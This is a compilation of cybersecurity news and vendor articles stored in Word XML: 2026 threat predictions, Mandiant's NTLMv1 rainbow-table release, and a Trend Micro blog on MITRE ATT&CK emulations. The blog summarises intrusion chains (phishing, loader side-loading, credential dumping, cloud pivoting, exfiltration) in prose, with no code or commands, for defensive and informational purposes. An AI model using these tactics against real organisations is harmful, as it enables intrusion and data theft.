not), but to write the code that exploits them.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"Command and control infrastructures will likely undergo a major transformation as adversaries shift to 'living off the cloud,' routing malicious traffic through the APIs of widely trusted services," Picus Security's жzarslan told ZDNET. "By masking communications within legitimate development and operational traffic to major cloud providers and AI platforms, attackers will render traditional blocklists and firewall rules ineffective. This trend indicates a future where distinguishing between authorized business activity and active backdoor signaling will require deep content inspection rather than simple reputation-based filtering."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Echoing earlier comments from NCC's Gibbons, NCC's Dankart said, "Expect campaigns to leverage AI for adaptive payloads and lateral movement across industrial networks." Programmable interfaces, like APIs, exist at the base of that lateral movement food chain - for legitimate as well as illegitimate actors.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2025 was the year of the agent, 2026 will be the year of interactions," said NCC's technical director and head of AI and ML David Brauchler. "Multi-agent systems are growing in popularity with the advent of [API] standards like MCP, and agents are being granted access to higher-trust operations, such as online transactions via Agent Commerce Protocol (ACP). We are likely to see agents grow in their capabilities, privileges, and communication complexity over the next year. And their risk profile will grow alongside them."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 Extortion tactics will evolve from ransomware encryption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research from Cybersecurity Ventures, the global total cost of ransomware damage is expected to increase by 30%, from $57 billion in 2025 to $74 billion in 2026. By 2031, the firm expects those costs to rise to as much as $276 billion. For some organizations, ransomware isn't just a threat to the bottom line; it's a threat to the business's survival. In July 2025, a ransomware attack forced the 158-year-old British transport company KNP to permanently shut its doors, resulting in 700 employees losing their jobs.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 a form of extortion, ransomware will continue to evolve and cross-link with AI. Expect an early wave of 'agentic malware' and AI- augmented ransomware campaigns," said NCC's Gibbons, Referring to a practice known as ransomware encryption (threat actors lock organizations out of their own systems by encrypting those systems until a ransom is paid), Gibbons added, "Instead of just encrypting systems, ransomware will shift towards greater dynamics in stealing, manipulating and threatening to leak or alter sensitive data, targeting backups, cloud services and supply chains."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PIcus Security's жzarslan agrees that 2026 will bring a shift in extortion tactics. "The volume of ransomware encryption attacks is expected to decrease significantly in 2026 as adversaries pivot their business models," he told ZDNET. "Rather than relying on the disruptive tactic of locking systems, ransomware will likely prioritize silent data theft for extortion, valuing long-term persistence over immediate chaos. This strategic shift suggests that attackers will focus on maintaining a quiet foothold within networks to exfiltrate sensitive assets undetected, effectively keeping the host operational for prolonged exploitation instead of causing an immediate shutdown."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Expect an early wave of AI-augmented ransomware campaigns.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NCC's Gibbons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From Google's point of view, ransomware, data theft, and multifaceted extortion will combine in 2026 to be the most financially disruptive category of global cybercrime. More often than not, such disruptions involve a so-called blast radius that extends outward from the initial attack.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is due not only to the sustained quantity of incidents, but also to the cascading economic fallout that consistently impacts suppliers, customers, and communities beyond the initial victim," noted Google's cybersecurity leaders. "The 2,302 victims listed on data leak sites (DLS) in Q1 2025 represented the highest single-quarter count observed since we began tracking these sites in 2020, confirming the maturity of the cyber extortion ecosystem."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 How the contagion spreads to industrial control and operations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Even if an organization has the resources to buy its way out of an extortion episode (and provided the threat actors keep to their end of the bargain), the disruption can be devastating to the business, particularly if the contagion spreads beyond IT proper into the industrial control (ICS) or operational technology (OT) estates.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"In October 2025, Jaguar Land Rover suffered a ransomware attack that forced a global production halt, disrupting supply chains and causing significant operational downtime," noted NCC's Dankaart. "This incident exemplifies how </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ransomware now targets manufacturing environments where IT and OT are deeply interconnected. Attackers combined encryption with data theft and public extortion tactics, pressuring the company to pay while production lines remained idle. The event highlighted the vulnerability of industrial networks and the cascading impact on suppliers and logistics. In 2026, this trend will continue, targeting ICS controllers and safety systems to maximize operational and reputational damage. Expect campaigns to leverage AI for adaptive payloads and lateral movement across industrial networks."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team at Google was more specific about the ICS/OT surface areas, calling out Microsoft's Windows as the soft white underbelly of operational technologies. In 2026, Google expects to see "ransomware operations specifically designed to impact critical enterprise software (such as ERP systems), severely disrupting the supply chain of data essential for OT operations."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vector is effective because compromising the business layer cripples the industrial environment, forcing quick payments," noted the authors of Google's report. "Meanwhile, poor hygiene like insecure remote access will continue to allow common Windows malware to breach OT networks."8. Imposter employees: The insider threat to your organization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 if there isn't enough surface area across your entire IT estate to look after, let's not let our guard down when it comes to our buildings and physical and virtual infrastructures, an apparently growing area of interest for threat actors.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definition of the 'insider threat' is anticipated to expand beyond rogue employees to include external actors utilizing remote access hardware to bypass endpoint security entirely," said Picus Security's жzarslan. "State-sponsored operatives are expected to increasingly deploy physical devices that plug directly into ports, granting BIOS-level control. This shift means that traditional software-based security agents will be rendered blind to these intrusions, forcing defenders to rely more heavily on physical audits and network-level anomalies to detect this class of threat."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NCC principal security consultant Mark Frost, "Raising awareness of the ease and simplicity of physically breaking into accredited, secure environments without detection will be one of the biggest challenges to tackle. Currently, there are no specific, government- recognized standards and accreditation for the delivery of simulated physical pentesting or the people who are authorized to carry out such tests. As such, we have cheap, short physical pentests as the 'standard.' This gives false positive results. Attackers spend months executing a physical attack, but the industry standard pentest is three days."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year is also expected to see a continued pattern of corporate infiltration by North Korean (DPRK) operatives. In December 2025, Amazon's chief security officer, Stephen Schmidt, published a post to LinkedIn that detailed the online retail giant's findings when it came to attempts by North Korean IT workers to secure remote IT jobs with the company.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Workers will continue to leverage their employment access for strategic espionage.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Google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"Over the past few years, North Korean nationals have been attempting to secure remote IT jobs with companies worldwide, particularly in the US Their objective is typically straightforward: Get hired, get paid, and funnel wages back to fund the regime's weapons programs," wrote Schmidt. "At Amazon, we've stopped more than 1,800 suspected DPRK operatives from joining since April 2024, and we've detected 27% more DPRK-affiliated applications quarter over quarter this year."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These "attacks" are very sophisticated, often involving a combination of identity theft and the impression of being physically located outside North Korea. The US Department of Justice has warned of the existence of domestically located laptop farms that are remotely accessible to DPRK operatives to make it look as though they live in the US during and after the job application process. In July 2025, an Arizona woman pled guilty "for her role in a fraudulent scheme that assisted North Korean IT workers posing as US citizens and residents with obtaining remote IT positions at more than 300 US companies."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 already uncovered coordinated deepfake hiring schemes where AI- generated candidates use synthetic identities and deepfaked video interviews to apply for multiple roles within the same organization," Pindrop's Balasubramaniyan told ZDNET. "Today, 16.8% of candidates, or 1 in 6, are fake. In 2026, enterprises will discover that some new hires who passed interviews, onboarding, and background checks were never real. These long-term 'synthetic employees' can gain access to internal trust, systems, and sensitive data."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risk associated with North Korean IT worker activity will continue to extend beyond simple salary earnings," noted the experts at Google. "One objective will be direct financial gain through the abuse of employer network access, specifically targeting and stealing cryptocurrency from crypto-focused organizations. Additionally, workers will continue to leverage their employment access for strategic espionage, as shown by the theft of sensitive data from a defense contractor developing AI technology."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 Nation-states will destabilize Western interests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North Korean IT worker scams are not the only cybercrimes in which DPRK operatives are involved. "North Korean cyber threat actors will escalate their highly successful and lucrative operations against cryptocurrency organizations and users," noted Google in its research. "The tactics observed in 2025, which included the largest recorded cryptocurrency heist valued at approximately $1.5 billion, provide a clear indication of their focus on high-yield financially motivated attacks."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Regarding North Korea, Google noted that "campaigns will additionally rely on advanced social engineering, such as luring targets with fake 'hiring assessment' webpages. Similarly, deepfake videos will become more prevalent to build trust and deceive high-value personnel."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Outside of threats from North Korea, Google was the only cybersecurity organization surveyed to organize its thoughts on adversarial nation-states by country. Russia, for example, is expected to continue its campaigns to destabilize Western geopolitics through election interference. However, in the course of doing so, it is expected to bring more advanced TTPs to bear.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Elections will remain a prime target.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2026 and beyond, Russia's cyber operations are expected to undergo a strategic shift, moving past a singular focus on short-term tactical support for the conflict in Ukraine to prioritize long-term global strategic goals," noted Google's experts. "The steady pace of cyber espionage in Europe and North America in 2025, alongside renewed use of novel and creative tactics, techniques and procedures, suggest a transition toward long-term development of advanced cyber capabilities, intelligence collection to support Russia's global political and economic interests."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Google's cybersecurity leaders further noted that "elections will remain a prime target, as seen in activities related to polls in Poland, Germany, Canada, and Moldova in 2025. Furthermore, information operation campaigns will actively seek to manipulate narratives related to news developments, such as promoting claims of alleged Western interference after Romania nullified its 2024 Presidential election."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 discussion of nation-state threats would be complete without mention of China. "We anticipate China-nexus cyber espionage tactics, techniques, and procedures will continue to focus on maximizing operational scale and success, with some threat actors also working to minimize opportunities for detection," wrote Google's cybersecurity leaders.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"China-nexus threat actors will continue to aggressively target edge devices (which typically lack endpoint detection and response solutions), and exploit zero-day vulnerabilities. They will also target third-party providers, since compromising one trusted partner may enable access to many downstream organizations, and abuse of legitimate partner connections makes the resulting malicious access challenging to identify."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 Credential mismanagement to continue as a leading cybersecurity challenge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At the heart of most intrusions lies a credential or identity breach. For this reason, credential mismanagement will remain a major challenge for organizations - especially as AI agents, which require their own credentials, begin to sprawl across corporate networks. Crowdstrike's just-announced intention to acquire SGNL is likely in anticipation of an emerging need to tame that forthcoming sprawl, although it's unclear if 2026 is the year that agentic AI will truly take off. Regardless of when agentic AI goes mainstream, companies like Microsoft and Okta are trying to get ahead of the problem by expanding their identity management solutions to manage the identities of AI agents as if they were humans.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Even so, NCC's Gibbons anticipates trouble at the layer where human and machine identity are managed, saying "third-party services, SaaS dependencies and identity mismanagement (including human and AI accounts) will become the dominant entry vectors, overtaking traditional perimeter breaches."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Such findings are not surprising given the very recent history of credential management.Salesforce breaches dominated 2025 cybersecurity news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biggest credential mismanagement-related breach in 2025 was actually a collection of breaches, most of which tied back to Salesforce. On the surface, it appeared as though some of the world's largest organizations, including tech companies, airlines, and luxury brands, were the ones getting hacked. But more often than not, those breaches were actually connected to a series of sophisticated attacks designed to exfiltrate the customer data that Salesforce hosts for them.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Although it has never been verified, the hackers claimed to have stolen more than a billion customer records from more than 700 organizations. While many enterprises have publicly disclosed the details of their breaches (with the number of impacted records typically in the millions for each company), many have not. The financial and reputational harm, the full extent of which has yet to be realized, has already been far-reaching.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Although Salesforce has denied culpability, many of the affected brands have pending lawsuits against the CRM company.Oauth credentials at the center of Salesforce breaches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case of the Salesforce breaches, many of the exfiltrations were enabled by theft of a type of credential known as an Oauth token. End users typically rely on a secret password to access various applications. OAuth tokens work in a similar, secretive way when, in a context commonly described as machine-to-machine integration, applications must authenticate to other applications.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Harkening back to those exfiltrations while referring to a Top 25 Common Weakness Enumeration list for 2025 jointly published by the US Cybersecurity and Infrastructure Security Agency (CISA) and the Homeland Security Systems Engineering and Development Institute (HSSEDI) operated by the MITRE Corporation, AppOmni chief security officer Cory Michal noted that CISA is oddly "underplaying CWE-522 regarding insufficiently protected credentials."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Adversaries use stolen tokens to access data without ever touching a user's password.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AppOmni's Michal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OAuth credentials "become a skeleton key into thousands of downstream SaaS tenants," said Michal. "We're seeing adversaries use those stolen tokens to access CRM and collaboration data without ever touching a user's password, and I'd expect that pattern, and therefore CWE- 522's real-world impact to keep growing in 2026."</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Despite CWE-522's glaring omission from that Top 25 list, the Computer Security Resource Center at the US National Institute of Standards and Technology is giving it the priority it deserves, having published a NIST interagency request that seeks expert comments on protecting tokens and assertions from forgery, theft, and misuse.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"There's no question the success of ShinyHunters/UNC6040 and Drift/UNC6395 has caught the attention of other threat groups," noted AppOmni CTO and co-founder Brian Soby. "They will view those incidents as clear examples of the weaknesses in today's zero trust technologies and will double down on similar attack methods."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"Identity compromise is projected to transition from a preliminary step to a primary objective, with adversaries focusing on logging in rather than hacking in," Picus Security's жzarslan told ZDNET. "Attackers will likely prioritize the silent extraction of credentials from password stores and browsers, bypassing complex encryption mechanisms by abusing legitimate system APIs. This evolution suggests that the perimeter will definitively move to the identity layer, where the theft of valid sessions and tokens allows threat actors to operate with the freedom of legitimate users, making behavioral analysis crucial for detection."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CISOs held more accountable than ever in 2026</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Ten years from now, cybersecurity pros will likely look back on 2026 as a tipping point for defenders. As NCC's Brauchler put it, "[AI] is an exciting era of technology, but the threat landscape of AI continues to look like it will get much worse before it gets better."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Brauchler's colleague, NCC Transport Practice Lead Gary Cannon, captured the worsening consequences quite well when he wrote that "breaches are no longer isolated events; they are systemic risks impacting reputation, revenue, and regulatory compliance. Boards and executive committees will increasingly see cyber risk as a top-tier business risk, not just an IT issue."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 threat actors are able to better scale their attacks and as those attacks begin to land with more frequency while escaping detection and presenting more of a risk to the business, chief information security officers (CISOs) will be saddled with more accountability than ever.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"2026 will be remembered as the year the security industry made accountability non-negotiable. The CISO's role will evolve into that of a business risk leader," wrote Cannon. "As ransomware and large-scale breaches continue to escalate, cybersecurity will climb even higher on corporate risk registers. This shift will demand clarity, business-aligned communication, and proof that investment translates into resilience. CISOs will gain unprecedented budgets and resources in 2026. However, with greater investment comes greater scrutiny. The expectation will be clear: Deliver measurable resilience."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Cyber-resilience will become a competitive differentiator.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NCC's Gibbons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Cannon also noted that "the evolving accountability landscape for CISOs will surprise many. Historically, breaches were seen as 'experience- building' events for security leaders. By late 2026, that narrative will shift. Breaches tied to poor decisions or underinvestment will carry real consequences, including stalled careers," he said. NCC's Gibbons put it even more succinctly when he said "cyber-resilience will become a competitive differentiator."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"Organizations will demand proactive risk management, measurable outcomes, and transparency," noted Cannon. " Cyber security will become a shared responsibility across the C-suite, with stronger regulatory frameworks and even personal liability for executives in certain jurisdictions."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 CISOs get bigger budgets, they'll need to train existing team members while also recruiting personnel from a relatively limited talent pool. NCC Managed Services Portfolio VP Natalie Walker said, "There is a growing cyber skills shortage, making it more important for organizations to leverage managed service providers for data analysis and prioritization, providing intelligent action, and enabling security teams to focus more on critical mitigating activities, which ultimately reduces their risk appetite and makes the organization more secure."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CISO will go from being an IT security manager to a C-suite executive in charge of making sure the organization stays resilient in 2026," Picus's жzarslan told ZDNET. "The traditional 'gatekeeper' approach will no longer be successful. This requires a proactive, predictive, and preemptive approach, anticipating and mitigating threats before they impact the organization. CISOs will also be crucial to AI governance. They will need to collaborate with the CTO and legal teams to make sure that AI systems are safe, ethical, and compliant."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>ZDNet 2026.01.25 15:00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.zdnet.com/article/10-ways-ai-will-do-unprecedented-damage-in-2026-experts-warn/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mandiant pushes organizations to dump insecure NTLMv1 by releasing a way to crack it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Jan 19, 2026</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Tough love campaign is the latest attempt to kill a zombie Microsoft protocol that won't die.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Google's Mandiant security division has come up with an unusual tactic to persuade organizations to stop using the aged and hugely insecure NTLMv1 authentication protocol: publish a data lookup that makes cracking NTLMv1 credentials trivial for attackers.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The intention, Mandiant explained, is to draw attention to the fact that, despite decades of evidence that NTLMv1 (NT LAN Manager version 1) is insecure, organizations continue to use it. Anyone can use Mandiant's Net- NTLMv1 pre-computed rainbow table lookup, downloadable from the Google Cloud Research Dataset portal, to map a given server response to reconstruct a real NT hash.</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Hashes, of course, are mathematical representations of real passwords, but are just as useful to criminals when exploited using techniques such as pass-the-hash. The benefit is time and money saved: Mandiant reckons its rainbow table allows the recovery of an NTLMv1 key in 12 hours using a computer costing $600, rather than relying on third party services or expensive hardware to brute-force the keys.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None of this makes NTLMv1 less secure or easier to target than it already is. Mandiant's hope is that the release of the table will serve as a reminder that the problem exists, prompting organizations to finally rip out NTLMv1 from their networks.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legacy protocol leaves organizations vulnerable to trivial credential theft, yet it remains prevalent due to inertia and a lack of demonstrated immediate risk," the company said in its announcement. "By releasing these tables, Mandiant aims to lower the barrier for security professionals to demonstrate the insecurity of Net-NTLMv1." Long fallback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NTLMv1 is a 1990s challenge-response protocol used to authenticate Windows NT users to Active Directory (AD). Based on 1980's Data Encryption Standard (DES) encryption, it was updated to the more secure NTLMv2 in 1996 before being completely replaced by Kerberos. Unfortunately, legacy protocols like NTLMv1 don't just disappear, and are retained as a fallback in case they are needed by older applications. That fallback has turned out to last decades.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evidence does Mandiant have that organizations are still using NTLMv1? The first is anecdotal: "Mandiant consultants continue to identify its use in active environments," the company noted in last week's announcement.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Secondly, cyberattackers regularly target it. For example, a 2024 campaign by the TA577 threat group targeted NTLM hashes by using booby-trapped emails to send challenge-response authentication requests to internal SMB resources such as legacy printers.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more recent incident involved an authentication relay attack aimed at a specific NTLM vulnerability, CVE-2025-54918, which came only weeks after Microsoft announced that it was finally removing NTLMv1 support from Windows Server 2025 and Windows 11.</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Primary hurdle: Knowing it's still there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Rob Finn, International vice president at supply chain security company Chainguard, even security-aware organizations could be caught out by NTLMv1.</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"Legacy protocols like NTLMv1 are buried deep within third-party firmware. A security team might deprecate NTLMv1 at the OS level, only to have a legacy printer driver or industrial sensor reintroduce it via an unpatched, decades-old library," he said. "For most companies, the primary hurdle isn't just knowing NTLMv1 is insecure, it's knowing that it's still there."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Because resources such as printers are not externally exposed, it is tempting to assume they are beyond the reach of attackers. Despite this, NTLMv1 can still be targeted from outside the network using relay or coercion techniques, by, for example, triggering authentication via a phishing attack.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"Attackers don't need to know you're using it. They just have to poke the system to find out. Fundamentally, organizations keep legacy protocols active not because they want to, but because they fear breaking a mission- critical legacy app," said Finn.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Despite Microsoft recommending that organizations upgrade to NTLMv2 and Kerberos for more than two decades, it appears not everyone got the memo. "In crypto terms, NTLMv1 isn't just old, it's archaeological," said Rob Anderson, head of reactive consulting services at Reliance Cyber. "NTLMv1 is still enabled, not because it is needed today, but because it was needed once, and nobody is quite brave enough to turn it off and see what breaks."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Despite those fears, organizations need to take action. "Scan for its use, find out why it is in use, register it as a high risk and get to work removing it, with achievable deadlines," he advised.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article originally appeared on CSOonline.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John E. Dunn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Follow John E. Dunn on X Follow John E. Dunn on LinkedIn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John E. Dunn is a veteran cybersecurity reporter, specializing in crisis response, ransomware, data breaches, encryption, quantum computing and QKD, DevSecOps, managed services, cybersecurity in education, retail cybersecurity, vulnerability reporting, and cybersecurity ethics.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John is a former editor of the UK editions of Personal Computer Magazine, LAN Magazine, and Network World. In 2003 he co-founded Techworld, since when he has covered cybersecurity and business computing for a range of publications including Computerworld, Forbes, Naked Security, The Register, and The Times.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>ComputerWorld 2026.01.19 23:41</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.computerworld.com/article/4118820/mandiant-pushes-organizations-to-dump-insecure-ntlmv1-by-releasing-a-way-to-crack-it-2.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Key Insights on SHADOW-AETHER-015 and Earth Preta from the 2025 MITRE ATT&amp;CK Evaluation with Trend Vision OneTM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blog discusses notable modern TTPs observed from SHADOW-AETHER-015 and Earth Preta, from Trend ResearchTM monitoring and Trend Vision OneTM intelligence. These findings support the performance of TrendAITM in the 2025 MITRE ATT&amp;CK Evaluations.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Trend Micro Jan 13, 2026</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Key takeaways: The MITRE ATT&amp;CK Evaluation Round 7 (ER7 2025) validates the progress made by Trend Vision OneTM toward a unified security operations platform. This blog discusses further the results of TrendAITM in ER7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Scenario 1 (Demeter), an emulation inspired by SHADOW-AETHER-015 shows the complexity of modern cloud attacks, where adversaries can pivot from compromised endpoints to cloud infrastructure, leveraging stolen credentials and tokens to establish persistence, move laterally across hybrid environments, and exfiltrate sensitive data at scale.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Meanwhile, scenario 2 (Hermes), the emulation inspired by Earth Preta, highlights the sophistication of phishing-based attacks, emphasizing the use of advanced loaders, anti-analysis techniques, lateral movement, credential harvesting, and data exfiltration, followed by meticulous cleanup to reduce forensic traces and hinder detection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>TrendAI's results in the MITRE ATT&amp;CK ER7 align strongly with the current need for platforms to automatically correlate telemetry into meaningful alerts across hybrid environments. Trend Vision OneTM detects and blocks the IoCs related to the threat actors mentioned in this blog. TrendAI customers can also access tailored hunting queries, threat insights, and intelligence reports to better understand and proactively defend against these threat actor groups.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blog examines notable modern techniques, tactics, and procedures (TTPs) that Trend ResearchTM has observed in the two emulations during the MITRE ATT&amp;CK Evaluation Round 7 (ER7 2025) that featured Earth Preta (also known as Mustang Panda), and SHADOW-AETHER-015 (Trend Research's intrusion name for a particular group of activities with modern TTPs characterized by AI-generated attacks, sophisticated phishing attacks, and/or social engineering). These observed, analyzed, and reported TTPs support the performance of Trend Vision OneTM in ER7, reinforcing the position of TrendAITM as a trusted leader in detection and response innovation.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ER7 marked a significant evolution in MITRE's approach where, it now includes both on-premises and cloud-based attacks, as well as the Reconnaissance tactic. This not only simulates hybrid environments that real SOC teams defend against today but also highlights the necessity for SOC teams to rely on effective enterprise tools. Trend Vision One's results in ER7 reinforces TrendAI's position as a trusted leader in detection and response innovation. Enterprises can rely on the platform for up to date, and up to standard analytic coverage across all major attack steps, protection across all evaluated attack opportunities, and cloud layer coverage, including both detection and protection.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MITRE scenario 1 (Demeter) In this emulation, cloud (AWS) scenarios highlighted how attackers can pivot from an endpoint into the cloud where the intrusion begins by phishing an unmanaged workstation using an adversary-in-the-middle SSO kit to steal high-privilege credentials and MFA tokens. This enables RDP access, internal discovery, Active Directory enumeration, and reconnaissance of shared network resources.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attacker then pivots to AWS, enumerating IAM, S3, VPCs, and costs while evadingdefenses,establishingpersistence through a new admin IAM user and a privileged EC2 instance. This allows them to harvest secrets and tokens, moving laterally across Linux and Windows systems usingtunnellingand RMM tools.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attack concludes with large-scale data collection and exfiltration, syncing application and file-share data from internal systems to attacker- controlled S3 buckets.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section provides a high-level summary of how Scenario1(Demeter) unfolds, highlighting the core execution flow, infrastructure interactions, and progression of the attack chain frominitialaccess through cleanup.</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a detailed, step-by-step breakdown of the scenario that includes emulation context, tooling, and attackobjectives, refer toMITRE's official CTI emulation documentation.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information that enterprises should know about SHADOW-AETHER-015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Scenario 1 is inspired by observed TTPs from SHADOW-AETHER-015, a highly adaptable and aggressive cybercriminal group known for fluent English- language social engineering, particularly vishing and help-desk impersonation, which allows operators to blend effectively into corporate support environments.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Their activity is characterized by identity abuse, and cloud compromise. The group is also known to use multi-pressure extortion: high-value data theft, leak threats, ransomware, cloud/VMware disruption, and employee intimidation. SHADOW-AETHER-015 primarilytargetsidentity and access management systems such as Okta and Azure AD/Entra ID, abusing social engineering, MFA fatigue, token theft, and adversary-in-the-middle phishing to bypass authentication controls. After gaining identity access, the threat actorsleveragelegitimate credentials with IAM misuse and configuration abuse to move laterally across SaaS and cloud environments, including AWS, Azure, and Google Workspace.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Activities linked to the group initially focused on SIM-swapping and telecommunications fraud, but has since evolved to target cloud, SaaS, and enterprise environments for data theft and, in some cases, ransomware deployment. The group diversifies monetization through cryptocurrency theft, account-takeover resale, long-term cloud persistence, partnerships with multiple RaaS groups, and selling large customer datasets.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SHADOW-AETHER-015 is a group focused on high-value, high-leverage intrusions, and have been observed to consistently pursue enterprises with massive data, complex IT operations, and low tolerance for downtime. Their list of victims suggest that the group prioritizes sectors rich in credit- card data, travel records,healthcareand loyalty information.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group's operations have affected telecommunications and business process outsourcing (BPO) providers. The group has also compromised tech SaaS and identity platforms to obtain privileged access into enterprise environments, alongside notable intrusions in hospitality and gaming organizations.Additionaltargets include finance and insurance firms, aviation and travel operators, and managed service provider (MSP) and IT companies.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SHADOW-AETHER-015 has been observed to be most active in English-speaking countries such as the US, UK, Canada, and Australia, with additional victim presence in India, Singapore, Thailand, and Brazil.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earliest structured campaigns linked to the group occurred infrom March to July 2022under the "0ktapus" phishing campaign, but it should be noted that some SIM-swapping activity that could be potentially linked to early SHADOW-AETHER-015 operators predates this.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group's progression shows rapid improvement in both technical sophistication and operational ambition as shown in figure 1.</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 A timeline of notable events observed from the threat actor group SHADOW-AETHER-015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MITREScenario 2 (Hermes)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scenario 2, the attack begins with a phishing email that delivers a malicious document, leading the victim to download a password-protected archive and execute a malicious LNK file that side-loads the ORPHEUS loader.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loader performs anti-analysis checks, injects into a trusted process, loads shellcode in memory, andestablishesencrypted command-and-control (C&amp;C). From there, the attacker conducts host and network discovery, pivots laterally using remote execution techniques, andestablishesa remote command interface on higher-value systems.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Credential access is achieved by extracting directory service databases and registry hives, which are staged and exfiltrated for offline cracking. Persistence is then established through registry run keys and scheduled tasks tomaintainaccess. The attacker proceeds to collect and compress targeted documents using archiving utilities, exfiltrating the data via command-line transfer tools over existing C&amp;C channels.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Finally, cleanup scripts are executed to remove persistence mechanisms and on-disk artifacts, reducing forensic evidence and hindering detection.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section provides a high-level summary of how scenario 2 (Hermes) unfolds, highlighting the core execution flow, infrastructure interactions, and progression of the attack chain frominitialaccess through cleanup.</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a detailed, step-by-step breakdown of the scenario that includes emulation context, tooling, and attackobjectivesrefer toMITRE's official CTI emulation documentation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2 shows a timeline of notable pivots in Earth Preta's tooling, infrastructure, and core TTPs used, as monitored by Trend Research.</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2. A timeline of Earth Preta's key tooling, infrastructure, and core TTPs through its reported period of activity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information that enterprises should know about Earth Preta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Scenario 2 is inspired by Earth Preta, a China-based advanced persistent threat (APT) group that has beenactive since at least 2012.Earth Preta's operations are primarily driven bystate-aligned intelligenceobjectives. The group focuses onpolitical and military intelligence collection, long-term strategic awareness, andsurveillance of communities, prioritizing sustained access and information gathering over direct financial gain.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group's activity shows a strong concentration inAsia and Southeast Asia, reflecting strategic regional interests. However, Earth Preta has alsodemonstratedthe capability and intent tooperatebeyond this region, extending campaigns intoEurope and other global locationswhen aligned with broader geopoliticalobjectives.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government-related entitiesremainthe primary targets, Earth Preta campaignsfrequentlyexpand intostrategic industriessuch asenergy, maritime, infrastructure, manufacturing, telecommunications, and transportation. Targeting these sectors suggests an interest ineconomic, industrial, and critical infrastructure intelligence, that are integral to a country's position in international relations.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Earth Preta carefully selects infrastructure that enablespersistent access and intelligence collection, often prioritizinggovernment networks, enterprise environments, and systems supporting domain services, file storage, and internal communications. Their targeting reflects an emphasis on environments that provide broad visibility into organizational operations and strategic decision-making processes.Earth Preta's operations are also marked by frequent updates to tooling, flexible infection and persistence mechanisms, and a willingness to shift tactics, all of which suggest significant resources, sophistication, and the intention to stay continue operating long-term. These are further discussed in table 1.</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Over time the group has adopted many aliases, including 